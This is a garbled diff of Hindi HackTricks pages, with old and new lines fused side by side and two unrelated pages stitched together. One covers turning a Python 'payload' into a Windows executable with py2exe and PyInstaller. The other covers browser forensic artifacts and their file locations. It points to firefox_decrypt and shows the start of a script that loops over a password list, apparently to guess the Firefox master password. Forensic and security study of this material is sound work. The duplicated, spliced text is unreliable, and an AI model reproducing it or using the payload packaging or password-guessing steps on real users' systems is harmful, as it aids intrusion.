3. एक बार script तैयार हो जाए, हमें "python setup.py py2exe" आदेश जारी करना होगा। यह executable बनाएगा, जैसे Figure 2 में दिखाया गया है। 3. एक बार script तैयार हो जाए, हमें "python setup.py py2exe" इस आदेश को जारी करना होगा। यह executable बनाएगा, जैसे Figure 2 में दिखाया गया है।
``` ```python
from distutils.core import setup from distutils.core import setup
import py2exe, sys, os import py2exe, sys, os
@ -180,7 +182,7 @@ zipfile = None,
) )
``` ```
``` ```bash
C:\Users\test\Desktop\test>python setup.py py2exe C:\Users\test\Desktop\test>python setup.py py2exe
running py2exe running py2exe
*** searching for required modules *** *** searching for required modules ***
@ -193,10 +195,10 @@ running py2exe
copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe
Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
``` ```
### PyInstaller का उपयोग करके एक पेलोड बनाने के लिए: ### PyInstaller का उपयोग करके payload बनाने के लिए:
1. पाइप का उपयोग करके PyInstaller को इंस्टॉल करें (pip install pyinstaller)। 1. Pip का उपयोग करके PyInstaller को इंस्टॉल करें (pip install pyinstaller)।
2. इसके बाद, हमें इस आदेश को जारी करना होगा "pyinstaller --onefile hello.py" (ध्यान दें कि 'hello.py' हमारा पेलोड है)। इससे सब कुछ एक एक्जीक्यूटेबल में बंडल हो जाएगा। 2. इसके बाद, हमें आदेश जारी करना होगा "pyinstaller --onefile hello.py" (ध्यान दें कि 'hello.py' हमारा payload है)। इससे सब कुछ एक executable में बंडल हो जाएगा।
``` ```
C:\Users\test\Desktop\test>pyinstaller --onefile hello.py C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
108 INFO: PyInstaller: 3.3.1 108 INFO: PyInstaller: 3.3.1
@ -225,7 +227,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का **विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! * यदि आप अपनी कंपनी का **विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।

View file

@ -6,70 +6,75 @@
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके * **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\ \
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) का उपयोग करें और दुनिया के **सबसे उन्नत समुदाय उपकरणों** द्वारा संचालित **वर्कफ़्लो** को आसानी से बनाएं और स्वचालित करें।\ [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और दुनिया के **सबसे उन्नत समुदाय उपकरणों** द्वारा संचालित **वर्कफ़्लो** को आसानी से बनाएं और स्वचालित करें।\
आज ही पहुंचें: आज ही पहुंचें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## ब्राउज़र आर्टिफैक्ट्स <a href="#id-3def" id="id-3def"></a> ## ब्राउज़र आर्टिफैक्ट्स <a href="#id-3def" id="id-3def"></a>
जब हम ब्राउज़र आर्टिफैक्ट्स के बारे में बात करते हैं, तो हम नेविगेशन हिस्ट्री, बुकमार्क्स, डाउनलोड की गई फ़ाइलों की सूची, कैश डेटा आदि के बारे में बात करते हैं। ब्राउज़र आर्टिफैक्ट्स में वेब ब्राउज़र्स द्वारा संग्रहित विभिन्न प्रकार के डेटा शामिल हैं, जैसे नेविगेशन हिस्ट्री, बुकमार्क्स, और कैश डेटा। ये आर्टिफैक्ट्स ऑपरेटिंग सिस्टम के भीतर विशेष फोल्डर में रखे जाते हैं, जो ब्राउज़र के अलग-अलग स्थानों में भिन्न नामों में होते हैं, लेकिन सामान्य रूप से समान प्रकार के डेटा को संग्रहित करते हैं।
े आर्टिफैक्ट्स ऑपरेटिंग सिस्टम में विशेष फ़ोल्डर में स्टोर की जाने वाली फ़ाइलें हैं। हाँ सबसे सामान्य ब्राउज़र आर्टिफैक्ट्स का सारांश है:
प्रत्येक ब्राउज़र अपनी फ़ाइलें अन्य ब्राउज़रों से अलग स्थान पर स्टोर करता है और उनके पास अलग-अलग नाम होते हैं, लेकिन वे सभी (अधिकांश समय) समान प्रकार के डेटा (आर्टिफैक्ट्स) स्टोर करते हैं। - **नेविगेशन हिस्ट्री**: उपयोगकर्ता की वेबसाइटों पर यात्राएँ ट्रैक करता है, जो किसी भी दुष्ट साइट पर यात्राओं की पहचान के लिए उपयोगी है।
- **ऑटोकंप्लीट डेटा**: आधारित सुझाव जो अक्सर की गई खोजों पर आधारित हैं, जो नेविगेशन हिस्ट्री के साथ मिलाकर अवलोकन प्रदान करते हैं।
- **बुकमार्क्स**: उपयोगकर्ता द्वारा त्वरित पहुंच के लिए सहेजी गई साइटें।
- **एक्सटेंशन और एड-ऑन्स**: उपयोगकर्ता द्वारा स्थापित ब्राउज़र एक्सटेंशन या एड-ऑन्स।
- **कैश**: वेब सामग्री (जैसे छवियाँ, जावास्क्रिप्ट फ़ाइलें) को संयोजन समयों को बेहतर बनाने के लिए संग्रहित करता है, जिसे फोरेंसिक विश्लेषण के लिए मूल्यवान माना जाता है।
- **लॉगिन्स**: संग्रहित लॉगिन क्रेडेंशियल्स।
- **फेविकॉन्स**: वेबसाइटों से संबंधित आइकन्स, जो टैब्स और बुकमार्क्स में प्रकट होते हैं, उपयोगी होते हैं उपयोगकर्ता यात्राओं पर अतिरिक्त जानकारी के लिए।
- **ब्राउज़र सेशन्स**: खुले ब्राउज़र सत्र से संबंधित डेटा।
- **डाउनलोड्स**: ब्राउज़र के माध्यम से डाउनलोड की गई फ़ाइलों के रिकॉर्ड।
- **फॉर्म डेटा**: वेब फ़ॉर्मों में दर्ज की गई जानकारी, भविष्य के ऑटोफ़िल सुझाव के लिए सहेजी गई।
- **थंबनेल्स**: वेबसाइटों की पूर्वावलोकन छवियाँ।
- **कस्टम डिक्शनरी.txt**: उपयोगकर्ता द्वारा ब्राउज़र के शब्दकोश में जोड़े गए शब्द।
चलिए हम देखते हैं कि ब्राउज़र्स द्वारा स्टोर किए जाने वाले सबसे सामान्य आर्टिफैक्ट्स क्या हैं।
* **नेविगेशन हिस्ट्री:** उपयोगकर्ता की नेविगेशन हिस्ट्री के बारे में डेटा शामिल है। उदाहरण के लिए उपयोगकर्ता ने कुछ दुष्ट साइटों पर जाए होने का पता लगाने के लिए उपयोग किया जा सकता है ## फायरफ़ॉक्स
* **ऑटोकंप्लीट डेटा:** यह डेटा है जिसे ब्राउज़र सुझाव देता है आपके द्वारा सबसे अधिक खोजा गया आधारित। इसे नेविगेशन हिस्ट्री के साथ उपयोग करके अधिक जानकारी प्राप्त की जा सकती है।
* **बुकमार्क्स:** स्वयं समझदारी।
* **एक्सटेंशन्स और एड ऑन्स:** स्वयं समझदारी।
* **कैश:** वेबसाइटों पर नेविगेट करते समय, ब्राउज़र विभिन्न प्रकार के कैश डेटा (छवियाँ, जावास्क्रिप्ट फ़ाइलें…आदि) बनाता है बहुत से कारणों के लिए। उदाहरण के लिए वेबसाइटों के लोडिंग समय को तेज करने के लिए। ये कैश फ़ाइलें एक जांच जाँच के दौरान डेटा का एक महान स्रोत हो सकती हैं।
* **लॉगिन्स:** स्वयं समझदारी।
* **फेविकॉन्स:** वे छोटे आइकन हैं जो टैब, यूआरएल, बुकमार्क्स और इस प्रकार की जगहों पर पाए जाते हैं। इन्हें एक और स्रोत के रूप में उपयोग किया जा सकता है वेबसाइट या उपयोगकर्ता द्वारा जाए गए स्थानों के बारे में अधिक जानकारी प्राप्त करने के लिए।
* **ब्राउज़र सेशन्स:** स्वयं समझदारी।
* **डाउनलोड्स**: स्वयं समझदारी।
* **फॉर्म डेटा:** फॉर्म में टाइप किया गया कुछ भी ब्राउज़र द्वारा अक्सर स्टोर किया जाता है, ताकि अगली बार जब उपयोगकर्ता फॉर्म में कुछ भरता है तो ब्राउज़र पहले से भरे गए डेटा का सुझाव दे सके।
* **थंबनेल्स:** स्वयं समझदारी।
* **कस्टम डिक्शनरी.txt**: उपयोगकर्ता द्वारा शब्द जोड़े गए।
## फायरफॉक्स फायरफ़ॉक्स प्रोफ़ाइल्स के भीतर उपयोगकर्ता डेटा को संगठित करता है, जो ऑपरेटिंग सिस्टम के आधार पर विशेष स्थानों में संग्रहीत होते हैं:
फायरफॉक्स \~/_**.mozilla/firefox/**_ (Linux) में प्रोफाइल फ़ोल्डर बनाता है, **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS) में, _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\ - **Linux**: `~/.mozilla/firefox/`
इस फ़ोल्डर के अंदर, फ़ाइल _**profiles.ini**_ उपयोगकर्ता प्रोफ़ाइल(स) के नाम(स) के साथ दिखना चाहिए।\ - **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/`
प्रत्येक प्रोफ़ाइल में "**पथ**" चरण होता है जिसमें उस फ़ोल्डर का नाम होता है जिसमें उसका डेटा स्टोर होगा। फ़ोल्डर को **\_\_profiles.ini**\_\*\* के साथ उपस्थित होना चाहिए। अगर यह नहीं है, तो संभावना है कि यह हटा दिया गया था। - **Windows**: `%userprofile%\AppData\Roaming/Mozilla/Firefox/Profiles/`
प्रत्येक प्रोफ़ाइल के फ़ोल्डर के अंदर (_\~/.mozilla/firefox/\<ProfileName>/_) पढ़ने योग्य निम्नलिखित फ़ाइलें मिलनी चाहिए: इन निर्देशिकाओं के भीतर एक `profiles.ini` फ़ाइल उपयोगकर्ता प्रोफ़ाइल्स की सूची देती है। प्रत्येक प्रोफ़ाइल के डेटा को `profiles.ini` के समान निर्देशिका में स्थित `Path` चर में नामित एक फ़ोल्डर में संग्रहीत किया जाता है। यदि किसी प्रोफ़ाइल का फ़ोल्डर अनुपस्थित है, तो यह हटा दिया गया हो सकता है।
* _**places.sqlite**_ : इतिहास (moz\_\_places), बुकमार्क्स (moz\_bookmarks), और डाउनलोड्स (moz\_\_annos)। Windows में उपकरण [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) का उपयोग _**places.sqlite**_ में इतिहास पढ़ने के लिए किया जा सकता है। प्रत्येक प्रोफ़ाइल फ़ोल्डर के भीतर, आप कई महत्वपूर्ण फ़ाइलें पा सकते हैं:
* इतिहास डंप करने के लिए क्वेरी: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;`
* ध्यान दें कि लिंक प्रकार एक संख्या है जो इंडिकेट करती है: - **places.sqlite**: इतिहास, बुकमार्क्स, और डाउनलोड संग्रहीत करता है। [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) जैसे उपकरण Windows पर इतिहास डेटा तक पहुंच सकते हैं।
* 1: उपयोगकर्ता ने लिंक का पालन किया - इतिहास और डाउनलोड जानकारी निकालने के लिए विशेष SQL क्वेरी का उपयोग करें।
* 2: उपयोगकर्ता ने यूआरएल लिखा - **bookmarkbackups**: बुकमार्क की बैकअप करता है।
* 3: उपयोगकर्ता ने पसंदीदा का उपयोग किया - **formhistory.sqlite**: वेब फ़ॉर्म डेटा संग्रहीत करता है।
* 4: आईफ्रेम से लोड किया गया - **handlers.json**: प्रोटोकॉल हैंडलर प्रबंधित करता है।
* 5: HTTP रीडायरेक्ट 301 के माध्यम से पहुंचा गया - **persdict.dat**: कस्टम शब्दकोश शब्द।
* 6: HTTP रीडायरेक्ट 302 के माध्यम से पहुंचा गया - **addons.json** और **extensions.sqlite**: स्थापित एड-ऑन्स और एक्सटेंशन की जानकारी।
* 7: फ़ाइल डाउनलोड किया गया - **cookies.sqlite**: कुकी संग्रहण, जिसे Windows पर जांच के लिए [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) उपलब्ध है।
* 8: उपयोगकर्ता ने आईफ्रेम के अंदर लिंक का पालन किया - **cache2/entries** या **startupCache**: कैश डेटा, [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html) जैसे उपकरणों के माध्यम से पहुंचने योग्य।
* डाउनलोड्स डंप करने के लिए क्वेरी: `SELECT datetime(lastModified/1000000,'unixepoch') AS down_date, content as File, url as URL FROM moz_places, moz_annos WHERE moz_places.id = moz_annos.place_id;` - **favicons.sqlite**: फेविकॉन्स संग्रहीत करता है।
* - **prefs.js**: उपयोगकर्ता सेटिंग्स और पसंद।
* _**bookmarkbackups/**_ : बुकमार्क्स बैकअप्स - **downloads.sqlite**: पुराने डाउनलोड डेटाबेस, अब places.sqlite में समाहित।
* _**formhistory.sqlite**_ : **वेब फॉर्म डेटा** (जैसे ईमेल) - **thumbnails**: वेबसाइट थंबनेल्स।
* _**handlers.json**_ : प्रोटोकॉल हैंडलर्स (जैसे, कौन _mailto://_ प्रोटोकॉल को हैंडल करेगा) - **logins.json**: एन्क्रिप्टेड लॉगिन जानकारी।
* _**persdict.dat**_ : उपयोगकर्ता द्वारा शब्द जोड - **key4.db** या **key3.db**: संवेदनशील जानकारी को सुरक्षित करने के लिए एन्क्रिप्शन कुंजियाँ संग्रहीत करता है।
इसके अतिरिक्त, ब्राउज़र की एंटी-फिशिंग सेटिंग्स की जांच करने के लिए `prefs.js` में `browser.safebrowsing` एंट्रीज़ की खोज करना किया जा सकता है, जो सुरक्षित ब्राउज़िंग सुविधाएँ सक्षम या अक्षम हैं।
मास्टर पासवर्ड को डिक्रिप्ट करने की कोशिश करने के लिए, आप [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt) का उपयोग कर सकते हैं\
निम्नलिखित स
```bash ```bash
#!/bin/bash #!/bin/bash
@ -86,97 +91,68 @@ done < $passfile
## Google Chrome ## Google Chrome
Google Chrome उपयोगकर्ता के घर के अंदर प्रोफ़ाइल बनाता है _**\~/.config/google-chrome/**_ (Linux), में _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows), या _**/Users/$USER/Library/Application Support/Google/Chrome/**_ (MacOS)। Google Chrome उपयोगकर्ता प्रोफ़ाइल को ऑपरेटिंग सिस्टम के आधार पर विशिष्ट स्थानों में संग्रहित करता है:
अधिकांश जानकारी _**Default/**_ या _**ChromeDefaultData/**_ फ़ोल्डर में सहेजी जाएगी जो पहले निर्दिष्ट पथों के अंदर हैं। यहाँ आप निम्नलिखित दिलचस्प फ़ाइलें पा सकते हैं:
* _**History**_: URLs, डाउनलोड और खोजे गए शब्द। Windows में, आप इतिहास पढ़ने के लिए उपकरण [ChromeHistoryView](https://www.nirsoft.net/utils/chrome\_history\_view.html) का उपयोग कर सकते हैं। "Transition Type" स्तंभ का मतलब है: - **Linux**: `~/.config/google-chrome/`
* Link: उपयोगकर्ता ने लिंक पर क्लिक किया - **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\`
* Typed: URL लिखा गया था - **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/`
* Auto Bookmark
* Auto Subframe: जोड़ें
* Start page: होम पेज
* Form Submit: एक फ़ॉर्म भरा और भेजा गया था
* Reloaded
* _**Cookies**_: कुकीज़। [ChromeCookiesView](https://www.nirsoft.net/utils/chrome\_cookies\_view.html) का उपयोग कुकीज़ की जांच करने के लिए किया जा सकता है।
* _**Cache**_: कैश। Windows में, आप उपकरण [ChromeCacheView](https://www.nirsoft.net/utils/chrome\_cache\_view.html) का उपयोग कैश की जांच करने के लिए कर सकते हैं।
* _**Bookmarks**_: बुकमार्क्स
* _**Web Data**_: फ़ॉर्म इतिहास
* _**Favicons**_: फ़ेविकॉन्स
* _**Login Data**_: लॉगिन जानकारी (उपयोगकर्ता नाम, पासवर्ड...)
* _**Current Session**_ और _**Current Tabs**_: वर्तमान सत्र डेटा और वर्तमान टैब्स
* _**Last Session**_ और _**Last Tabs**_: इन फ़ाइलों में वह साइटें हैं जो ब्राउज़र में सक्रिय थीं जब Chrome को आखिरी बार बंद किया गया था।
* _**Extensions**_: एक्सटेंशन्स और एडऑन्स फ़ोल्डर
* **Thumbnails** : थंबनेल्स
* **Preferences**: इस फ़ाइल में प्लगइन्स, एक्सटेंशन्स, जियोलोकेशन का उपयोग करने वाली साइटें, पॉपअप्स, सूचनाएँ, DNS prefetching, प्रमाणपत्र अपवाद और बहुत कुछ जैसी अच्छी जानकारी की एक बहुत सारी जानकारी होती है। यदि आप जांच कर रहे हैं कि क्या कोई विशिष्ट Chrome सेटिंग सक्षम थी या नहीं, तो आप शायद इसमें उस सेटिंग को पाएंगे।
* **Browsers built-in anti-phishing:** `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`
* आप बस “**safebrowsing**” के लिए grep कर सकते हैं और परिणाम में `{"enabled: true,"}` खोज सकते हैं जो दिखाता है कि एंटी-फिशिंग और मैलवेयर सुरक्षा सक्षम है।
## **SQLite DB Data Recovery** इन निर्देशिकाओं में, अधिकांश उपयोगकर्ता डेटा **Default/** या **ChromeDefaultData/** फोल्डर में पाया जा सकता है। निम्नलिखित फ़ाइलें महत्वपूर्ण डेटा रखती हैं:
जैसा कि आप पिछले खंडों में देख सकते हैं, च्रोम और फ़ायरफ़ॉक्स दोनों डेटा सहेजने के लिए **SQLite** डेटाबेस का उपयोग करते हैं। इस उपकरण का उपयोग करके **हटाए गए एंट्रीज़ को पुनः प्राप्त किया जा सकता है** [**sqlparse**](https://github.com/padfoot999/sqlparse) **या** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases)। - **History**: URL, डाउनलोड और खोज कीवर्ड शामिल है। Windows पर, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) का उपयोग इतिहास को पढ़ने के लिए किया जा सकता है। "Transition Type" स्तंभ में विभिन्न अर्थ होते हैं, जैसे उपयोगकर्ता लिंक पर क्लिक करते हैं, टाइप किए गए URL, फॉर्म सबमिशन और पेज रीलोड्स।
- **Cookies**: कुकीज़ संग्रहित करता है। जांच के लिए, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) उपलब्ध है।
- **Cache**: कैश डेटा को रखता है। जांच करने के लिए, Windows उपयोगकर्ता [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) का उपयोग कर सकते हैं।
- **Bookmarks**: उपयोगकर्ता बुकमार्क्स।
- **Web Data**: फॉर्म इतिहास शामिल है।
- **Favicons**: वेबसाइट फेविकॉन्स को संग्रहित करता है।
- **Login Data**: उपयोगकर्ता नाम और पासवर्ड जैसी लॉगिन क्रेडेंशियल्स शामिल हैं।
- **Current Session**/**Current Tabs**: वर्तमान ब्राउज़िंग सत्र और खुले टैब्स के बारे में डेटा।
- **Last Session**/**Last Tabs**: क्रोम बंद होने से पहले चल रहे अंतिम सत्र के बारे में जानकारी।
- **Extensions**: ब्राउज़र एक्सटेंशन्स और एडऑन्स के लिए निर्देशिकाएँ।
- **Thumbnails**: वेबसाइट थंबनेल्स को संग्रहित करता है।
- **Preferences**: एक फ़ाइल जिसमें सेटिंग्स के लिए जानकारी है, जैसे प्लगइन्स, एक्सटेंशन्स, पॉप-अप्स, सूचनाएँ और अधिक।
- **Browsers built-in anti-phishing**: जांचने के लिए कि क्या एंटी-फिशिंग और मैलवेयर सुरक्षा सक्षम हैं, `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences` चलाएं। आउटपुट में `{"enabled: true,"}` खोजें।
## **SQLite DB डेटा रिकवरी**
जैसा कि आप पिछले खंडों में देख सकते हैं, च्रोम और फ़ायरफ़ॉक्स डेटा संग्रहित करने के लिए **SQLite** डेटाबेस का उपयोग करते हैं। इस उपकरण का उपयोग करके **sqlparse**](https://github.com/padfoot999/sqlparse) **या** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases) से हटाए गए एंट्री को बहाल किया जा सकता है।
## **Internet Explorer 11** ## **Internet Explorer 11**
इंटरनेट एक्सप्लोरर **डेटा** और **मेटाडेटा** विभिन्न स्थानों में संग्रहित करता है। मेटाडेटा डेटा खोजने में मदद करेगा। इंटरनेट एक्सप्लोरर 11 अपने डेटा और मेटाडेटा को विभिन्न स्थानों पर प्रबंधित करता है, जो संग्रहित जानकारी और उसके संबंधित विवरणों को आसान पहुंच और प्रबंधन के लिए सहायक होता है
मेटाडेटा फ़ोल्डर में मिल सकता है `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` जहाँ VX V01, V16, या V24 हो सकता है।\ ### मेटाडेटा संग्रहण
पिछले फ़ोल्डर में, आप फ़ाइल V01.log भी पा सकते हैं। यदि इस फ़ाइल की **संशोधित समय** और WebcacheVX.data फ़ाइल का **अलग है** तो आपको संभावित **असंगतताओं** को ठीक करने के लिए आदेश `esentutl /r V01 /d` चलाने की आवश्यकता हो सकती है। इंटरनेट एक्सप्लोरर के लिए मेटाडेटा `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` में संग्रहित होता है (VX V01, V16, या V24 होता है)। इसके साथ, `V01.log` फ़ाइल `WebcacheVX.data` के साथ संशोधन समय विसंगतियों को दिखा सकती है, जिससे `esentutl /r V01 /d` का उपयोग करके मरम्मत की आवश्यकता हो सकती है। इस मेटाडेटा, जो एक ईएसई डेटाबेस में संग्रहित है, को उपकरणों जैसे photorec और [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) का उपयोग करके पुनर्प्राप्त और जांचा जा सकता है। **Containers** तालिका में, प्रत्येक डेटा सेगमेंट को संग्रहित करने वाले विशिष्ट तालिकाएँ या कंटेनर्स को अलग किया जा सकता है, जिसमें स्काइप जैसे अन्य माइक्रोसॉफ्ट उपकरणों के लिए कैश विवरण शामिल हैं।
एक बार इस आर्टिफैक्ट को पुनः प्राप्त किया गया है (यह एक ESE डेटाबेस है, photorec इसे विनिमय डेटाबेस या EDB विकल्प के साथ पुनर्प्राप्त कर सकता है) तो आप इसे खोलने के लिए प्रोग्राम [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) का उपयोग कर सकते हैं। एक बार **खोलने** के बाद, जाएं तालिका नामित "**Containers**". ### कैश जांच
[IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) उपकरण कैश जांच के लिए अनुमति देता है, जिसमें कैश डेटा निकालने वाले फ़ोल्डर का स्थान होता है। कैश के लिए मेटाडेटा में फ़ाइल नाम, निर्देशिका, एक्सेस गिनती, URL मूल, और कैश निर्माण, एक्सेस, संशोधन, और समाप्ति समय की टाइमस्टैम्प शामिल हैं।
![](<../../../.gitbook/assets/image (446).png>) ### कुकीज़ प्रबंधन
कुकीज़ [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) का उपयोग करके जांची जा सकती है, जिसमें मेटाडेटा नाम, URL, एक्सेस गिनती, और विभिन्न समय संबंधित विवरण शामिल हैं। स्थायी कुकीज़ `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies` में संग्रहित होती हैं, जबकि सत्र कुकीज़ मेमोरी में रहती हैं।
इस तालिका के अंदर, आप प्राप्त सूचना के प्रत्येक हिस्से को किस अन्य तालिकाओं या कंटेनर में सहेजा गया है, वहाँ से आप ब्राउज़र्स द्वारा संग्रहित डेटा की **स्थान** और उसमें मौजूद **मेटाडेटा** पा सकते हैं। ### डाउनलोड विवरण
डाउनलोड मेटाडेटा [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) के माध्यम से उपलब्ध है, जिसमें विशिष्ट कंटेनर्स डेटा जैसे URL, फ़ाइल प्रकार, और डाउनलोड स्थान को संग्रहित करते हैं। भौतिक फ़ाइलें `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory` के तहत पाई जा सकती हैं।
**ध्यान दें कि यह तालिका अन्य माइक्रोसॉफ्ट उपकरणों के लिए भी कैश की मेटाडेटा को दर्शाता है (जैसे skype)** ### ब्राउज़िंग इतिहास
ब्राउज़िंग इतिहास की समीक्षा करने के लिए, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) का उपयोग किया जा सकता है, जिसमें निकाले गए इतिहास फ़ाइलों के स्थान और इंटरनेट एक्सप्लोरर के लिए विन्यास की आवश्यकता होती है। यहाँ मेटाडेटा में संशोधन और एक्सेस समय के साथ एक्सेस गिनती शामिल है। इतिहास फ़ाइलें `%userprofile%\Appdata\Local\Microsoft\Windows\History` में स्थित हैं।
### कैश ### टाइप किए गए URL
टाइप किए गए URL और उनके उपयोग समय रजिस्ट्री के अंदर `NTUSER.DAT` में `Software\Microsoft\InternetExplorer\TypedURLs` और `Software\Microsoft\InternetExplorer\TypedURLsTime` के तहत संग्रहीत होते हैं, जो उपयोगकर्ता द्वारा दर्ज किए गए अंतिम 50 URL और उनके अंतिम इनपुट समय का ट्रैकिंग करते हैं।
आप टूल [IECacheView](https://www.nirsoft.net/utils/ie\_cache\_viewer.html) का उपयोग कैश की जांच करने के लिए कर सकते हैं। आपको उस फ़ोल्डर की स्थान दर्शाना होगा जहाँ आपने कैश डेटा निकाला है।
#### मेटाडेटा ## Microsoft Edge
कैश के बारे में मेटाडेटा जानकारी सहेजता है: Microsoft Edge उपयोगकर्ता डेटा को `%userprofile%\Appdata\Local\Packages` में संग्रहित करता है। विभिन्न डेटा प्रकारों के लिए मार्ग हैं:
* डिस्क में फ़ाइल का नाम - **प्रोफ़ाइल पथ**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
* SecureDIrectory: कैश निर्देशिकाओं के अंदर फ़ाइल का स्थान - **इतिहास, कुकीज़, और डाउनलोड**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
* AccessCount: कितनी बार यह कैश में सहेजा गया था - **सेटिंग्स, बुकमार्क्स, और पढ़ने की सूची**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
